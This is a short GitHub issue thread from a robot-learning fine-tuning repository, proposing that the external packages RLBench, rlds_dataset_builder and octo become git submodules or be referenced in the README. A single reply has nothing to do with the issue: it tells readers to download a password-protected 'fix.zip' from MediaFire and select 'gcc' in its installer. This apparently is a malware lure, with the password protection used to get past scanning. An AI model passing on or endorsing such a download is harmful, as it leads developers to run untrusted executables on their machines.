### ISSUE TITLE
external-packages-as-submodules

### ISSUE THREAD

**Issue by mateuszwyszynski** [adambiel22/octo-rlbench-fine-tuning#4]
External packages:

- [ ] [RLBench](https://github.com/stepjam/RLBench)
- [x] [rlds_dataset_builder](https://github.com/kpertsch/rlds_dataset_builder)
- [ ] [octo](https://github.com/octo-models/octo)

should be either removed and simply referenced in the README or treated as [github submodlues](https://github.blog/open-source/git/working-with-submodules/)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
